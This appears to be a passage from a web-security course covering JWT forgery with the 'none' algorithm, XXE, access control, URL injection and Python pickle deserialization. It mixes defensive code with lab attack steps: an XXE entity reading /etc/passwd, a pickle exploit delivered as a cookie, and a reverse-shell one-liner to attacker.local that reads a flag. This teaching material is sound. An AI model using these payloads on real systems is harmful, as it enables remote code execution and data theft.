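payload = b64url(b'{"sub":"1234567890"}')         # step B, illustrative payload
key = b"example-secret"                           # hypothetical key K

signing_input = f"{header}.{payload}"             # step C
token = f"{signing_input}.{sign_hs256(signing_input, key)}"
print(token)
```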
Signature verification
An application that verifies a JWT must:
Know the algorithm used to sign the token.
Use that algorithm to calculate the signature from the JWT.
Compare the calculated signature with the signature included with the token and
verify that they match.
Check whether the token has expired or is still valid.
etc.
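A minimal verification sketch following the list above, using only the standard library. It assumes the application has decided in code that only HS256 is acceptable. The key is hypothetical and the expiry check is left out to keep the example short, so this is not a replacement for a maintained JWT library.

```python
import base64
import hashlib
import hmac
import json


def b64url_decode(part: str) -> bytes:
    return base64.urlsafe_b64decode(part + "=" * (-len(part) % 4))


def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def verify_hs256(token: str, key: bytes) -> dict:
    """Return the claims if the token carries a valid HS256 signature."""
    header_part, payload_part, signature_part = token.split(".")
    header = json.loads(b64url_decode(header_part))
    # The expected algorithm is fixed in code; the header is only checked against it.
    if header.get("alg") != "HS256":
        raise ValueError("unexpected algorithm")
    message = f"{header_part}.{payload_part}".encode("ascii")
    expected = hmac.new(key, message, hashlib.sha256).digest()
    # compare_digest avoids leaking information through timing differences.
    if not hmac.compare_digest(expected, b64url_decode(signature_part)):
        raise ValueError("signature mismatch")
    return json.loads(b64url_decode(payload_part))


key = b"example-secret"  # hypothetical key
header_part = b64url_encode(b'{"alg":"HS256","typ":"JWT"}')
payload_part = b64url_encode(b'{"sub":"1234567890"}')
signature = hmac.new(key, f"{header_part}.{payload_part}".encode("ascii"),
                     hashlib.sha256).digest()
token = f"{header_part}.{payload_part}.{b64url_encode(signature)}"
print(verify_hs256(token, key))  # {'sub': '1234567890'}
```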
JWT Vulnerabilities
JWT is a versatile standard, and it has historically been misunderstood both in
implementations (such as JWT software libraries used by applications) and in their
usage (applications where the JWT handler is not securely configured).
For example, where should the JWT verification code find out which algorithm is used
if the developer has not explicitly stated it in the application code? A perfectly
reasonable and natural answer is "from the JOSE header". That is why it is written
there. But what if the attacker alters the token information to their liking (e.g., "userId":
"admin") and then sets the algorithm of the token to "none", meaning no signature is
required? If the application accepts such a token, the consequences are catastrophic.
What if the JWT has been signed with a weak secret and an attacker manages to
guess it, and then creates their own tokens?
Let's now familiarize ourselves with one possible vulnerability, namely the support of
the "None" algorithm.
"None" Algorithm
One of the "signature algorithms" of JWT is "None", meaning no signature at all. If an
application accepts such tokens, even though the developer never intended it, anyone
can forge a token with whatever content they like. A JWT token whose signature
algorithm is "None" looks like this:
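As an illustration, such a token can be assembled with a few lines of Python. This is a sketch: the helper name unsigned_token is hypothetical and the userId claim is only an example value, so the exact claims in your lab will differ.

```python
import base64
import json


def b64url(data: bytes) -> str:
    """Base64url-encode without padding, as JWTs do."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def unsigned_token(claims: dict) -> str:
    """Assemble a token with alg "none" and an empty signature part."""
    header = {"alg": "none", "typ": "JWT"}
    parts = [
        b64url(json.dumps(header, separators=(",", ":")).encode("utf-8")),
        b64url(json.dumps(claims, separators=(",", ":")).encode("utf-8")),
        "",  # there is nothing to sign with, so the third part stays empty
    ]
    return ".".join(parts)


print(unsigned_token({"userId": "admin"}))
```

The token still has two periods, but nothing follows the last one.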
The second option is to use Burp Suite's "JSON Web Tokens" extension:
Step 4 - Victory
After assembling a new JWT, replace the originally present token in the HTTP request
and resend the request.
7 - XXE (XML External Entity) Attacks
Unexpected features
There are heaps of vulnerabilities with different names, but they can usually be
categorized into a considerably smaller number of basic concepts. One of these
concepts is "unexpected features", which refers to a vulnerability that arises because
the developer uses a software component, tool, protocol, etc. whose functionality they
do not fully understand.
One excellent example of this is the €20,000 bug bounty that GitLab paid out on the
HackerOne platform for a remote code execution vulnerability discovered in their
markdown editor. The vulnerability was in a feature of their markdown processor
(Kramdown) that they were not aware of, and it could be triggered by submitting
markdown in a specific format to the application.
https://hackerone.com/reports/1125425
However, a much more common vulnerability in this category is XML External Entity
(XXE), which we learn about in this course. As the name says, it concerns external
entities, a part of XML that developers often are not aware of.
What is XML?
XML (Extensible Markup Language) is a text-based format used for representing
structured data. If you have seen HTML code, you are likely already familiar with the
structure of XML. HTML is a closely related markup language that uses the same kind
of tags and attributes.
XML primarily consists of tags and attributes. Tags look like this <TAG START>TAG
CONTENT</TAG END>. So for example, a car with the brand "Lada" and the year
"1955" could be represented in XML as a car tag (auto), within which there is a brand
tag (merkki) with the value "Lada" and a year tag (vuosimalli) with the value "1955".
<auto>
  <merkki>Lada</merkki>
  <vuosimalli>1955</vuosimalli>
</auto>
Typically an XML document mixes both: tags contain text or other tags, and any tag can
also carry attributes.
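To see how a program reads such a document, here is a short sketch using Python's built-in xml.etree.ElementTree module on the car example. The variable names are chosen for illustration.

```python
import xml.etree.ElementTree as ET

document = """
<auto>
  <merkki>Lada</merkki>
  <vuosimalli>1955</vuosimalli>
</auto>
"""

car = ET.fromstring(document)
print(car.tag)                      # auto
print(car.find("merkki").text)      # Lada
print(car.find("vuosimalli").text)  # 1955
```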
DTD
DTD is an abbreviation for Document Type Definition and it can be used to specify the
structure of an XML document. The specification is done with the DOCTYPE tag as
follows.
<!DOCTYPE root_element [
  elements and entities
]>
Because characters such as < and > are part of the XML syntax itself, certain characters
are represented as entities if you do not want them to become part of the XML
structure. For example, the < character can be expressed as the entity &lt; and the >
character as the entity &gt;.
<auto>
  <merkki>Volvo&lt;XC60&gt;</merkki>
  <vuosimalli>2013</vuosimalli>
</auto>
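Programs rarely write these entities by hand. As a sketch, Python's standard library can do the conversion in both directions:

```python
from xml.sax.saxutils import escape, unescape

model = "Volvo<XC60>"
escaped = escape(model)

print(escaped)            # Volvo&lt;XC60&gt;
print(unescape(escaped))  # Volvo<XC60>
```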
DTD Entities
You can also define entities yourself. For example, just as the &gt; entity means the
> character, you can define that the entity &lempimerkki; ("favourite brand") means the
value Volvo. This can be done in the DTD specification as follows:
<!DOCTYPE auto
[
  <!ENTITY lempimerkki "Volvo">
]>
<auto>
  <merkki>&lempimerkki;</merkki>
  <vuosimalli>1955</vuosimalli>
</auto>
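A quick way to see the entity being replaced is to parse the document. The sketch below uses Python's xml.etree.ElementTree, which expands entities declared inside the document itself. Other parsers and configurations may behave differently.

```python
import xml.etree.ElementTree as ET

document = """<!DOCTYPE auto [
  <!ENTITY lempimerkki "Volvo">
]>
<auto>
  <merkki>&lempimerkki;</merkki>
  <vuosimalli>1955</vuosimalli>
</auto>"""

car = ET.fromstring(document)
# The parser has already replaced &lempimerkki; with its defined value.
print(car.find("merkki").text)
```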
External Entities
XML also supports external entities, which make it possible to assemble an XML
document from multiple parts. An external entity is defined with the keyword SYSTEM or
PUBLIC after the entity name. Think of a book, for example, with three different
chapters. The book could be composed of the XML documents book.xml, chapter1.xml,
chapter2.xml, and chapter3.xml.
The contents of a chapter file (kappale means chapter) could be:
<kappale>
  It was a dark and stormy night...
</kappale>
After resolving the external entities, an XML processor would output something like
this (kirja means book), while the structure of the book and the chapters remain nicely
separate in their own files.
<kirja>
  <kappale>
    It was a dark and stormy night...
  </kappale>
  <kappale>
    When our hero arrived at the destination...
  </kappale>
  <kappale>
    Completely unexpectedly...
  </kappale>
</kirja>
Vulnerability
If you have followed along so far, understanding the XXE vulnerability is relatively
simple. The attack works when the following hold:
The application contains code that handles XML.
The application's XML handler has not been configured to prevent the use of
external entities.
The attacker is able to input XML to be processed by the application.
An attacker can reference files on the server's disk using external entities.
The attacker is able to read the processed XML which contains the content of the
file desired by the attacker.
The attacker is thus able to read files from the server's disk in such cases.
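One common defensive idea is to refuse any document that declares a DTD at all, since external entities are defined there. The sketch below does this with Python's built-in expat bindings. The function and exception names are hypothetical, the payload is only an illustrative example of an external entity pointing at a local file, and a real application would normally rely on a hardened parser configuration or library instead.

```python
from xml.parsers import expat


class DTDForbidden(ValueError):
    """Raised when a document declares a DOCTYPE."""


def ensure_no_dtd(xml_text: str) -> None:
    """Parse the document and refuse it as soon as a DOCTYPE appears."""
    def on_doctype(name, system_id, public_id, has_internal_subset):
        raise DTDForbidden(f"DOCTYPE {name!r} is not allowed")

    parser = expat.ParserCreate()
    parser.StartDoctypeDeclHandler = on_doctype
    parser.Parse(xml_text, True)


attack = """<!DOCTYPE auto [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<auto><merkki>&xxe;</merkki></auto>"""

ensure_no_dtd("<auto><merkki>Lada</merkki></auto>")  # accepted silently

try:
    ensure_no_dtd(attack)
except DTDForbidden as error:
    print("rejected:", error)
```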
Good to know at this stage
There are many variations of XXE vulnerabilities and ways to exploit them. Depending
on the programming language, XML processor, and platform on which the application
is running, XXE can be used to do different things. The attacker also does not
necessarily need to see the processed XML directly, as there are techniques to leak
information over the network.
8 - Access control vulnerabilities
Tricky problem
Often there is a simple way to avoid a vulnerability. SQL injections can be avoided
by using a secure library for making SQL queries. XXE can be avoided by securely
initializing the XML handler. There are numerous other examples.
But access control does not belong to this group. Implementing access control is
usually not especially difficult, but it is terribly easy to make one critical mistake
with it that puts the security of the entire application at risk. Problems related to
access control are also easy for an attacker to find and exploit.
What is access control?
Identification means that the user is asked for some form of identification information,
such as a username and password, which can be used to verify that the user is who
they claim to be.
Session management refers to the process in which, once the user has been identified,
the user's identity is securely transmitted between the browser and the server. This
allows the user to not have to re-enter their username and password every time they
click something on the page.
Access control, or authorization, refers to the application making a decision on whether
a specific user is allowed to do or see something or not.
The following examples are access control decisions:
Can user X see user X's information?
Can user X delete user Y's data?
Can user X use function Y?
Appearance can be deceiving
It is important to remember that the user of the application is not limited to the
application's user interface. The user is limited only by the HTTP interface that the
application exposes; the user interface is merely built on top of it to make it easier
to use.
This means that it is extremely important for the application to take care of access
control on the server side, not just on the browser side. It doesn't matter for access
control purposes what menus the application visually has available. The only thing that
matters is what the code on the server side does with the HTTP request that comes
from the user.
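A minimal sketch of what a server-side decision can look like. The User class, the function names and the rule itself (owners and admins may delete) are assumptions made for illustration, not the lab application's actual code.

```python
from dataclasses import dataclass


@dataclass
class User:
    user_id: int
    is_admin: bool = False


def can_delete_data(requester: User, owner_id: int) -> bool:
    """Server-side decision: may the requester delete data owned by owner_id?"""
    return requester.is_admin or requester.user_id == owner_id


def handle_delete_request(requester: User, owner_id: int) -> int:
    """Return an HTTP status code for a delete request."""
    # The check runs for every request, regardless of which buttons the UI shows.
    if not can_delete_data(requester, owner_id):
        return 403
    return 204


print(handle_delete_request(User(user_id=1), owner_id=2))                 # 403
print(handle_delete_request(User(user_id=1), owner_id=1))                 # 204
print(handle_delete_request(User(user_id=9, is_admin=True), owner_id=2))  # 204
```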
9 - URL Injections
Common Injections
Injection is a vulnerability where data is inserted as a parameter into a protocol or
language, but the data manages to break out of its place and becomes part of the
structure itself.
URL Injection
URL injection is a simple example of this. When an application builds URLs, for
example to call another (internal) backend system, and adds a path or parameter from
user input to the URL, there is a risk of URL injection if the input is not properly
encoded.
Example
The next image represents a situation where URL injections can occur.
In the above picture, the webpage performs an HTTP request to a background service
using the user-provided username as part of the URL path.
url = "/varattu/" + kayttajan_antama_syote
This seems completely safe and innocent, but what happens if, instead of a username,
the user provides a value that changes the final destination of the request made by the
website? If the website does not build URLs securely, the user may be able to include,
for example, the ../ string in the input, which can sometimes allow traveling
backwards in the URL path.
In the above query, the user entered ../users as input, which modified the final location
of the query made by the website, causing the application to make an internal HTTP
request to a different path than intended by the developer.
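The effect of ../ and of proper encoding can be sketched in a few lines of Python. Here posixpath.normpath is used only to show where the path would point once the ../ segment is resolved. Whether a given HTTP client or server actually resolves it varies. The variable names are illustrative.

```python
import posixpath
from urllib.parse import quote

user_input = "../users"

# Plain concatenation, as in the example above.
unsafe_url = "/varattu/" + user_input
print(unsafe_url)                      # /varattu/../users
print(posixpath.normpath(unsafe_url))  # /users

# Percent-encoding the input keeps it inside a single path segment.
safe_url = "/varattu/" + quote(user_input, safe="")
print(safe_url)                        # /varattu/..%2Fusers
```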
Example
We start by registering in the application and inspect the resulting HTTP request in
Burp Suite.
We notice that registration causes an HTTP request to the interface /verify (the
/varmista route in the source code). Let's check how the interface works from the
source code.
@app.route("/varmista", methods=['POST'])
def varmista():
    sposti = request.form.get("sposti")
    responssi = requests.get("http://127.0.0.1:5000/api/user/"+
    return jsonify(responssi.json())
The code of the interface shows that the application receives the given email
address (sposti) and makes a new request to the interface /api/user/ + email. From the
source code, we also see that the application does not encode or validate the given
email address in any way, which means that the application is vulnerable to URL
injection attacks.
If we examine the code of the interface being called, we notice that it is not possible
to query it directly from the outside, as the interface checks that the requests are
coming from the address 127.0.0.1.
@app.route("/api/user/<user_mail>")
def user_api(user_mail):
    ip_address = flask.request.remote_addr
    if ip_address not in ('127.0.0.1', '::1', 'localhost'):
        ...
By examining the source code further, we can observe that the application also has
another internal interface with the same IP address check.
@app.route("/api/users", methods=['GET'])
def users_api():
    ip_address = flask.request.remote_addr
    if ip_address not in ('127.0.0.1', '::1', 'localhost'):
        abort(404)
    users = database.get_users()
    return jsonify({ 'Users': users })
The interface in question simply returns all application users from the database. We
use the discovered URL injection vulnerability to redirect the request made by the
/varmista interface to the above /api/users interface.
Voilà! We succeeded in redirecting the server's own HTTP request to another API, and
this returned the "Flag" to us.
10 - Deserialization vulnerabilities
What is serialization?
Serializing (serialization) is used in programming to transform objects into a format in
which they can, for example, be saved to a disk or transferred over a network.
Here is an example (serialisoi.py) that uses the Python pickle library to serialize a car.
import pickle
from base64 import b64encode, b64decode

class Auto(object):
    def __init__(self, merkki: str, vuosimalli: int):
        self.merkki = merkki
        self.vuosimalli = vuosimalli

    def __str__(self):
        return f"{self.merkki} VM {self.vuosimalli}"

auto = Auto(merkki='Volvo', vuosimalli=1975)
print(auto)
print(b64encode(pickle.dumps(auto)).decode('utf-8'))
When the script is executed, it will output the car in serialized (base64-encoded) format.
python3 ./serialisoi.py
Volvo VM 1975
gASVPgAAAAAAAACMCF9fbWFpbl9flIwEQXV0b5STlCmBlH2UKIwGbWVya2tpl
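A second script (deserialisoi.py) takes the serialized value as an argument and restores
the object from it.
import pickle
import sys
from base64 import b64decode

class Auto(object):
    def __init__(self, merkki: str, vuosimalli: int):
        self.merkki = merkki
        self.vuosimalli = vuosimalli

    def __str__(self):
        return f"{self.merkki} VM {self.vuosimalli}"

serialisoitu = sys.argv[1]
auto = pickle.loads(b64decode(serialisoitu))
print(auto)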
A class can define a __reduce__ function that tells pickle how the object should be
rebuilt. The original purpose of the function is to help parse the object correctly. But
the purpose we are interested in is executing arbitrary code on the server when the
application unpacks the "car"!
Car bomb
Let's make a third script, hax.py, which builds an object for us that has the __reduce__
function defined. The return value of the function is a tuple, where the first element is a
function and the second element is another tuple that contains the parameters.
In the example below, __reduce__ returns the tuple (print, ("PUM!",)), which means a
call to the print function with the parameter "PUM!".
import pickle
from base64 import b64encode, b64decode
import os

class Auto(object):
    def __init__(self, merkki: str, vuosimalli: int):
        self.merkki = merkki
        self.vuosimalli = vuosimalli

    def __reduce__(self):
        # pickle will call print("PUM!") when this object is deserialized
        return (print, ("PUM!",))

auto = Auto(merkki='Volvo', vuosimalli=1975)
print(b64encode(pickle.dumps(auto)).decode('utf-8'))
As a result, the application cannot reconstruct the car (its value becomes None, the
return value of print), but the application executes the attacker's code, i.e. print("PUM!").
python3 hax.py
gASVIwAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjAhlY2hvIFBVTZSFlFKUL
python3 deserialisoi.py gASVIwAAAAAAAACMBXBvc2l4lIwGc3lzdGVtl
PUM!
None
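The same mechanism can be observed with a harmless callable whose return value is easier to see. In this sketch, which uses len purely for illustration, the deserialized "car" turns out to be whatever the callable returned:

```python
import pickle


class Auto:
    def __reduce__(self):
        # pickle stores "call len('PUM!')" instead of the object's own data
        return (len, ("PUM!",))


restored = pickle.loads(pickle.dumps(Auto()))
print(type(restored).__name__, restored)  # int 4
```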
os.system
The os.system() function can be used to conveniently execute operating system
commands.
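import pickle
from base64 import b64encode, b64decode
import os

class Auto(object):
    def __init__(self, merkki: str, vuosimalli: int):
        self.merkki = merkki
        self.vuosimalli = vuosimalli

    def __reduce__(self):
        # pickle will call os.system("echo PUM") when this object is deserialized
        return (os.system, ("echo PUM",))

auto = Auto(merkki='Volvo', vuosimalli=1975)
print(b64encode(pickle.dumps(auto)).decode('utf-8'))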
python3 hax.py
gASVIwAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjAhlY2hvIFBVTZSFlFKUL
python3 deserialisoi.py "gASVIwAAAAAAAACMBXBvc2l4lIwGc3lzdGVtl
PUM
0
Summary
When an application tries to deserialize a serialized object that an attacker has been
able to modify, the attacker may be able to execute arbitrary code on the server. In the
case of Python's pickle, the easiest way to perform the attack is to serialize an object
that defines the __reduce__ function, because pickle stores the function call it returns
and performs that call during deserialization. Such functions that can execute code
during deserialization are commonly referred to as "gadgets".
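On the defensive side, Python's pickle documentation describes restricting which names an unpickler may look up by overriding find_class. The sketch below refuses every lookup, which is enough for plain data such as dictionaries and strings. The class and function names are hypothetical, and for untrusted input a data-only format such as JSON is generally the safer choice.

```python
import io
import os
import pickle


class NoGlobalsUnpickler(pickle.Unpickler):
    """Unpickler that refuses to look up any class or function by name."""

    def find_class(self, module, name):
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")


def restricted_loads(data: bytes):
    return NoGlobalsUnpickler(io.BytesIO(data)).load()


class Exploit:
    def __reduce__(self):
        return (os.system, ("echo PUM",))


print(restricted_loads(pickle.dumps({"lang": "en"})))  # plain data still loads

try:
    restricted_loads(pickle.dumps(Exploit()))
except pickle.UnpicklingError as error:
    print("rejected:", error)
```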
Example
Take an application that has a language selection.
Suspicious cookie
When the language of the application is changed, the application always sets a new
cookie "UserPrefs", which contains something clearly base64-encoded. We take the
value of the cookie, decode it, and save it to the file "userprefs.data".
echo 'gANjX19tYWluX18KVXNlclByZWZlcmVuY2VzCnEAKYFxAX1xAlgEAAA
Next, we investigate the file. Python has a built-in module for examining pickle files,
so we can check whether the file has been serialized with pickle like this:
python3 -m pickletools userprefs.data
0: \x80 PROTO 3
2: c GLOBAL '__main__ UserPreferences'
28: q BINPUT 0
30: ) EMPTY_TUPLE
31: \x81 NEWOBJ
32: q BINPUT 1
34: } EMPTY_DICT
35: q BINPUT 2
37: X BINUNICODE 'lang'
46: q BINPUT 3
48: X BINUNICODE 'en'
55: q BINPUT 4
57: s SETITEM
58: b BUILD
59: . STOP
highest protocol among opcodes = 2
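The same module can also be used from code. As a sketch, pickletools.genops walks through the opcodes without deserializing anything, so a pickle can be inspected safely. The helper name opcode_names and the Demo class are made up for illustration.

```python
import pickle
import pickletools


def opcode_names(data: bytes) -> set:
    """Collect the opcode names in a pickle without deserializing it."""
    return {opcode.name for opcode, argument, position in pickletools.genops(data)}


class Demo:
    def __reduce__(self):
        return (len, ("PUM",))


# Plain data needs no function call when it is loaded...
print("REDUCE" in opcode_names(pickle.dumps({"lang": "en"})))  # False
# ...while an object using __reduce__ contains the REDUCE (call) opcode.
print("REDUCE" in opcode_names(pickle.dumps(Demo())))          # True
```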
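The cookie is thus a pickled UserPreferences object, so we write an exploit script
(exploit.py) that produces a malicious pickle of our own:
import pickle
from base64 import b64encode
import os

command = '''
echo PUM
'''

class Exploit(object):
    def __reduce__(self):
        # os.system(command) is called when the object is deserialized
        return (os.system, (command,))

e = Exploit()
print(b64encode(pickle.dumps(e)).decode('utf-8'))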
Then you just execute the code and send the output to the application as a cookie.
python3 exploit.py
gASVKAAAAAAAAACMCGJ1aWx0aW5zlIwEZXZhbJSTlIwMcHJpbnQoJ1BVTScpl
HTTP REQUEST
GET / HTTP/1.1
Host: www-c0cpuypk1b.ha-target.com
Cookie: session=.eJw...; UserPrefs=gASVKAAAAAAAAACMCGJ1aWx0aW5
Connection: close
RESPONSE
The application crashes as expected because the cookie did not, of course, deserialize
into a UserPreferences object. However, if we were to look at the application log, we
would notice that it says "PUM".
Reverse Shell
It's time to take control of the server.
Start a netcat listener on port 4444. Next, run Python code on the target server that
connects to the port and gives control of the server to you.
nc -lvnp 4444
listening on [any] 4444 ...
nc = netcat
-l = listen
-v = verbose (tell when the connection is being established)
-n = avoid unnecessary DNS queries
-p = port
And what about that Python code? Handy script snippets for these situations can be
found, for example, in the PayloadsAllTheThings repository. Here is the Python code
that you can use in an attack. The code works as follows:
Open a connection to the address attacker.local (your attacker machine) on TCP
port 4444.
Open a shell (/bin/sh) and connect the shell's stdin, stdout, and stderr to a socket.
import socket,os,pty;s=socket.socket();s.connect(("attacker.l
You can run Python code snippets from the command line using "python -c <code>".
So your code will be:
import pickle
from base64 import b64encode
import os

command = '''
python -c 'import socket,os,pty;s=socket.socket();s.connect((
'''

class Exploit(object):
    def __reduce__(self):
        return (os.system, (command,))

e = Exploit()
print(b64encode(pickle.dumps(e)).decode('utf-8'))
Run the code and send the application the UserPrefs cookie with the serialized object as
the value. When the application deserializes it, it opens a remote connection (reverse
shell) to your listener. If everything goes well, you will get a shell in your listener
that allows you to read the flag.
root@whlhxbyzok-student:~# nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.0.1.108] from (UNKNOWN) [10.0.1.68] 55534
cat /flag.txt
eyJhbG...